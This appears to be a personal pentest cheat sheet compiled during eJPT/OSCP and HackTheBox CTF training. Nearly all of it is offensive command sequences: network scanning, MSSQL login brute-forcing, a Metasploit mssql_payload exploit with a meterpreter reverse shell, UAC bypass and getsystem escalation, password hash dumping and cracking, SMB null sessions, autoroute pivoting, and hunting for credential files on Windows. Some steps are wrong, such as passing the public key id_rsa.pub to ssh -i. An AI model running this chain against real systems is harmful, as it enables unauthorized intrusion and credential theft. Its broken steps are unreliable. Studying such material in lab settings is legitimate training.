note of the different commands / informations received during my training for the eJPT, OSCP, and during CTF / box on hackthebox.
pentest cheat sheet
note of the different commands / informations received during my training for the eJPT, OSCP, and during CTF / box on hackthebox.
nmap
nmap -sn ip/24 -oN discovery.nmap
cat discovery.nmap | grep "for" | cut -d " " -f 5 > ips.txt
nmap -sV -n -v -Pn -p- -T4 -iL ips.txt -A --open
add -O to find the OS
gobuster
gobuster -u 'url' -w /path/to/dir-list-med.txt
-U user
-P pass
mysql
connect
> mysql -u user -pPASS -h mysql_server --port=
see database
> show databases;
> use database_name;
see table
> show tables;
see content of tables
> SELECT * FROM accounts
use auxiliary/scanner/mssql/mssql_login
use auxiliary/admin/mssql/mssql_enum
--> xp_cmdshell is Enabled
--> remote access is Enabled
use exploit/windows/mssql/mssql_payload
search XXX
use XXX
show payload
show options
set payload windows ou linux/meterpreter/reverse_tcp
background = background current session
sessions -l
sessions -i X
getuid
getsystem
-->IF IT FAILS
background
search bypassuac
use exploit/windows/local/bypassuac
set session 1
exploit
getuid
getsystem
shell
search -f fichier_recherche
hashdump (then johntheripper to crack)
ssh
to use id_rsa.pub
create ~/.ssh/id_rsa.pub
ssh -i ~/.ssh/id_rsa.pub user@ip
give pass
dns
null session
perl enum4linux -a <ip>
<20> --> file sharing, carry on
smbclient -L //<ip> -N
connect without pass
smblient //<ip>/SHARE_NAME -N
routing
ip route add subnet/24 via <ip>
1) background meterpreter session
2) use post/multi/manage/autoroute
3) set SESSION 1
4) set SUBNET 172.16.50.0
5) set CMD add
6) run
find creds on windows
cd /
dir /s /b passwords.txt
dir /s /b credentials.txt